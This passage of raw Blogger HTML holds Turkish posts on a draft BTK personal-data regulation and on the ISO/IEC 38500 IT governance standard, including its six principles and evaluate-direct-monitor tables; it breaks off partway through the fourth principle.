<span style="text-align: justify; text-indent: -18pt;">13. Taslak Yönetmeliğin son bölümünde
yer alan İstisnalar maddesi aşağıdaki şekilde tanımlanmıştır.</span></div>
<div style="text-align: start; text-indent: 0px;">
<ul>
<li>(1) 6698 sayılı Kişisel Verilerin
Korunması Kanununda zikredilen istisnai haller için bu Yönetmelik hükümleri
uygulanmaz.</li>
<li>(2) İşletmeci kişisel verilerin
silinmesinden önce milli güvenlik, kamu düzeni, terörle mücadele gibi hususları
dikkate alarak Kurum’dan onay alır.</li>
</ul>
<div>
Taslak Yönetmelik metnini okumak ve hakkında görüş bildirmek için<a href="https://www.btk.gov.tr/tr-TR/Kamuoyu-Gorusu/Elektronik-Haberlesme-Sektorunde-Kisisel-Verilerin-Islenmesi-ve-Gizliliginin-Korunmasi-Hakkinda-Yonetmelik-Taslagi" target="_blank"> bağlantıyı tıklayınız</a>. </div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-24359568137821367192017-06-02T11:30:00.000+03:002017-06-02T11:30:09.592+03:00ISO/IEC 38500 Bilgi Teknolojileri Yönetişimi Standardı<div align="center" class="MsoNormal" style="line-height: 150%; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: center;">
<b>ISO/IEC
38500 Bilgi Teknolojileri Yönetişimi Standardı<br />
Ali Dinçkan, Gizem Göktaş, BTYÖN Danışmanlık<o:p></o:p></b></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Yönetişim (Governance) kelimesi
ilk kez 1980'lerin sonlarında birleşmiş milletler’in bir raporunda
kullanılmıştır. Türkçe’ye yönetim ve iletişim kelimelerinin birleştirilmesinden
oluşarak yönetişim şeklinde geçmiştir. Yönetişimin asıl amacı tüm paydaşların
yönetimde söz sahibi olması ilkesine dayanır. Bu açıdan ‘Paydaşlarla beraber
yönetim’ şeklinde de ifade edilebilir.
Yönetişim etkilenen tüm tarafların görüşleri ve çıkarları dikkate alınarak
doğru kararların alınması amacını güder.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Başarılı işletmeler bilgi
teknolojilerinin faydasını anlar ve bu bilgiyi paylaşlara sağladığı katkıyı
arttırmakta kullanır. Bu işletmeler, bir çok iş sürecinin bilgi teknolojilerine
kritik düzeyde bağımlı olduğunun, regülatif uyumluluğun öneminin ve riskin
etkin yönetiminin faydasının farkındadır. Bilgi teknolojileri yönetişimi alanı
ile ilgili zaman içerisinde bir çok standart ve çerçeve yayınlanmıştır. Bu
standart ve çerçevelerden en çok bilinenleri ISACA ( Bilgi Sistemleri Denetim
ve Kontrol Derneği) ve ITGI (Bilgi Teknolojileri Yönetişim Enstitüsü)
tarafından yayınlanan COBIT (Bilgi ve İlgili Teknolojiler İçin Kontrol
Hedefleri) çerçevesi ve ISO (Uluslararası Standartlar Organizasyonu) tarafından
yayınlanmış ISO/IEC 38500 Bilgi Teknolojilerinin Kurumsal Yönetişimi
standardıdır. Bu makalede ISO/IEC 38500 standardının bilgi teknolojilerinin
yönetişimi konusuna yaklaşımı ele alınacaktır.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">ISO/IEC 38500 standardı İnovasyona
önem veren, iş ihtiyaçları ile uyumlu, tanımlanmış sorumluluklar ile hesap
verilebilirliğin korunduğu, iş sürekliliği ve sürdürülebilirliğin sağlandığı, efektif
kaynak kullanımının olduğu, iyi seviyede paydaş ilişkilerinin bulunduğu ve mevzuata
uyumlu BT süreçleri için yönetişim yapısı tarifleyen bir iyi uygulama
standardıdır.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Organizasyonların bilgi teknolojilerinden yeterli faydayı elde
edememesinin nedenleri aşağıdaki gibi sıralanabilir;</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
</div>
<ul>
<li>Belirsiz sorumluluklar,</li>
<li>Şeffaf olmayan yatırımlar,</li>
<li>Değerlendirilmeyen gereksinimler,</li>
<li>Cezai yaptırımlar,</li>
<li>Bağımsız yürütülen yönetim sistemleri,</li>
<li>Birçok kez farklı noktalarda tekrar eden işler,</li>
<li>Yönetim ile operasyon arasında kopukluk,</li>
<li>BT ile iş birimleri arasında iletişimsizlik.</li>
</ul>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Organizasyonlarda oluşturulacak etkin bir BT yönetişim çerçevesi ile
aşağıdaki faydaların elde edilmesi amaçlanmaktadır.</span></div>
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
</div>
<ul>
<li>İş ihtiyaçlarına yanıt verebilen BT servisleri
oluşur,</li>
<li>BT servis kalitesi artar,</li>
<li>İş ile bilgi teknolojileri daha yakın hale gelir,</li>
<li>BT müşteri memnuniyet seviyesi artar,</li>
<li>Üretkenlik yüksek seviyelere ulaşır,</li>
<li>BT servisleri sürekli iyileşir,</li>
<li>BT harcamaları şeffaflaşır ve yatırım geri
dönüşü hesap edilebilir,</li>
<li>Kullanıcı üretkenliğinin düşmesine sebep olan
olay sayıları azalır,</li>
<li>Uyum,</li>
<li>Sorumluluklar netleşir.</li>
</ul>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">ISO/IEC 38500 standardı
içerisinde iyi BT yönetişimi için 6 adet temel ilke açıklanmıştır. Bu ilkeler
geneldir ve türlerinden bağımsız olarak bir çok organizasyona uygulanabilir.
İlkeler karar almayı desteklemek üzere önerilen davranışları özetler.
Standartta her bir ilke için ne yapılması gerektiği açıklanır fakat bu ilkeleri
kim, nasıl uygular konusuna işletmeden işletmeye değişebileceği için
değinilmez. Organizasyonların yönetim kurullarının bu ilkelerin yerine geirilmesinden
sorumlu olduğu belirtilir.<o:p></o:p></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT Yönetişim İlkeleri</span></div>
<div class="MsoNormal" style="text-align: justify;">
</div>
<ul>
<li>İlke 1 – Sorumluluk: Sorumlulukların ve bu
sorumlulukların gerektirdiği yetkilerin tanımlı ve atanmış olmasıdır.</li>
<li>İlke 2 – Stateji: Kuruluşun stratejisi, iş
hedefleri ile BT yeteneklerinin ve planlarının uyumlu olmasıdır.</li>
<li>İlke 3 – Edinim: BT edinimlerinin
(yatırımlarının) analizler temelinde şeffaf bir şekilde yapılmasıdır. Fayda,
maliyet, fırsat ve riskler arasında kısa vadede bir denge tarifler.</li>
<li>İlke 4 – Performans: Bilgi teknolojilerinin; iş
hedeflerine ulaşmak için yeterli olduğunu, ihtiyaçları karşıladığını ve hizmet
kalitesi seviyesini raporlamayı tarifler.</li>
<li>İlke 5 – Uyumluluk: Bilgi teknolojileri
kullanımının tüm zorunlu mevzuat ve yönetmeliklere uygun olmasıdır. BT
politikaları ve uygulamaları açıkça tanımlanmış olmalıdır.</li>
<li>İlke 6 – İnsan Davranışı: Süreç dahilindeki
bütün bireylerin mevcut ve değişen ihtiyaçlarına, insani davranış ve değerlere
uygun politika, prosedür ve uygulamalar oluşturulmasıdır.</li>
</ul>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span style="font-size: 3.0pt; line-height: 115%;"><span style="font-family: "arial" , "helvetica" , sans-serif;"> </span></span><span style="font-family: "arial" , "helvetica" , sans-serif;">ISO/IEC 38500 standardına göre BT
Yönetişim modeli üç ana görev içerir;</span></div>
<div class="MsoNormal" style="text-align: justify;">
</div>
<ol>
<li><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">Bilgi
teknolojilerinin mevcut ve gelecekte ki kullanımını </span><u style="font-family: Arial, Helvetica, sans-serif; text-indent: -17.85pt;">değerlendirme</u><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">,</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">İş
hedeflerini karşılayan bir bilgi teknolojileri kullanımını sağlamak için
gerekli plan ve politikaların hazırlanması ve hayata geçirilmesini </span><u style="font-family: Arial, Helvetica, sans-serif; text-indent: -17.85pt;">yönlendirme</u><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">,</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">Politikalara
ve planlanan performans seviyelerine uyumu </span><u style="font-family: Arial, Helvetica, sans-serif; text-indent: -17.85pt;">izleme</u><span style="font-family: "arial" , "helvetica" , sans-serif; text-indent: -17.85pt;">.</span></li>
</ol>
<br />
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Özet olarak BT yönetişim modeli
bilgi teknolojilerini değerlendirme (evaluate), yönlendirme (direct) ve izleme
(monitor) faaliyetlerinden oluşur.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-AfVdKLrUSsQ/WTEV_YNv8vI/AAAAAAAABBU/Ta3ix2d896IMA0byAEJ6VwZrQ1kMJJeDgCLcB/s1600/BTY%25C3%25B6neti%25C5%259Fim.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img border="0" data-original-height="715" data-original-width="1057" height="432" src="https://2.bp.blogspot.com/-AfVdKLrUSsQ/WTEV_YNv8vI/AAAAAAAABBU/Ta3ix2d896IMA0byAEJ6VwZrQ1kMJJeDgCLcB/s640/BTY%25C3%25B6neti%25C5%259Fim.png" width="640" /></span></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT Yönetişimi içerisinde yer alan
değerlendirme faaliyeti iş hedefleri, risk iştahı, yetkinlik, ana iş süreçleri,
ana BT hizmetleri, düzenleyici taraflar, teknolojik durum, sektör trendleri,
dış tehditler, paydaş gereksinimleri gibi konuların değerlendirilmesini içerir.
Bu faaliyet kapsamında mevcut durumun tanımı ve iş hedeflerinin analizi
gerçekleştirilir.</span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendirme faaliyeti kapsamında
ise risk, uyum, karar destek mekanizmaları ve iş stratejilerinin çıktılarına
dayalı BT stratejilerinin tanımı yapılır. Bu kapsamda değişimin başlatılması için
bütçe, yetkinlik gelişim, paydaşların katılımı, standart işler ile projelerin
ayrıştırılması, fırsatların değerlendirilmesi, önceliklendirmeleri yapılması gibi
işlemler gerçekleştirilir. Son olarak risk, denetim ve yönlendirme komiteleri
tanımlanır ve 6 BT yönetişim ilkesi çerçevesinde destek sağlanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">İzleme faaliyeti kapsamında
başarı kriterlerinin tanımı yapılır ve izleme sistemlerinin hayata geçirilmesi sağlanır.
Bu kapsamda “Doğru şeyi yapıyor muyuz? İlerliyor muyuz? Nasıl
iyileştirebiliriz?” gibi soruların cevapları aranır. Son olarak yönetimin BT hakkında
düzenleyici mevzuat ve sözleşme yükümlülükleri ve iç çalışma uygulamaları ile uyumlu
olduğundan emin olmak üzere gerekli faaliyetler yerine getirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT yönetişim modeli içerisinde
bulunan değerlendir, yönlendir ve izle yaklaşımı ISO/IEC 38500 standardına her
bir BT yönetişim ilkesi için ayrı ayrı tanımlanmıştır.<o:p></o:p></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 1 – Sorumluluk<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT kabiliyetlerinin bugünkü ve gelecekteki
kullanımı konusunda sorumlular atanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sorumluluk, yetki ve yetkinliklerin
yeterlilikleri göz önünde bulundurulur.<b><o:p></o:p></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Genellikle sorumluluk sahipleri, kuruluşun iş
hedefleri ve performansından sorumlu iş birimi yöneticileri olurken; bilgi
teknolojileri uzmanları tarafından desteklenir<b><o:p></o:p></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Yönetişim sorumlusu tarafından, BT
stratejilerinin sorumluluk sahiplerince takip edilmesi ve hayata geçirilmesi
desteklenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sorumluluk sahiplerinin ihtiyaç duydukları bilgilere
ulaşabilir olması sağlanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">İlgili süreçlere dair izleme metotları
geliştirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sorumluluklar onaylanır, bildirilir ve
tanımlanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Sorumluluk sahiplerinin performansları izlenir.
(Örneğin; yönlendirme komitelerine sunulanlar)</span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 2 – Stateji<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Gelecekteki iş ihtiyaçlarının karşılanması için
BT ve iş süreçlerinde gerekli geliştirmeler sağlanır.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Kurum hedefleri, paydaş beklentileri ve iyi
uygulamalar dikkate alınarak stratejiler belirlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Risk yönetimi stratejilerin belirlenmesinde göz
önünde bulundurulur.<b><o:p></o:p></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT geliştirmeleri ile kurum strateji ve
politikalarına uyum sağlanması garanti edilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Fırsatlar ve iyileştirmeleri değerlendirebilmek
için yenilikçi girişimler desteklenir.<b><o:p></o:p></b></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Hedeflerin başarımı izlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Elde edilen faydalar değerlendirilir.</span></div>
</td></tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 3 – Edinim<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Değerlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Risk ve maliyet dengesine uygun olarak yatırım
seçenekleri değerlendirilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr style="height: 44.1pt; mso-yfti-irow: 1;">
<td style="border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; height: 44.1pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Yönlendir<o:p></o:p></span></b></div>
</td>
<td style="border-bottom: solid windowtext 1.0pt; border: none; height: 44.1pt; mso-border-bottom-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">BT sistem ve altyapı varlıkları gerekli
kabiliyetler ve servislerle birlikte dokümante edilir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">İş gereksinimlerine uygun olarak uygulamalar
desteklenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
<tr>
<td style="border-right: solid windowtext 1.0pt; border: none; mso-border-right-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 76.3pt;" valign="top" width="127"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İzle<o:p></o:p></span></b></div>
</td>
<td style="border: none; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 382.0pt;" valign="top" width="637"><div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Gereken kabiliyetler dikkate alınarak BT
yatırımları izlenir.<o:p></o:p></span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;">Yatırımlarda paydaşlarla aynı yaklaşımda olup
olmadıkları izlenir.</span></div>
<div class="MsoNormal" style="line-height: normal; margin-bottom: .0001pt; margin-bottom: 0cm; text-align: justify;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
</td>
</tr>
</tbody></table>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">İlke 4 – Performans<o:p></o:p></span></b></div>
<div class="MsoNormal" style="text-align: justify;">
<b><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></b></div>
<table border="0" cellpadding="0" cellspacing="0" class="MsoTableGrid" style="border-collapse: collapse; border: none; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;">
<tbody>
<tr>
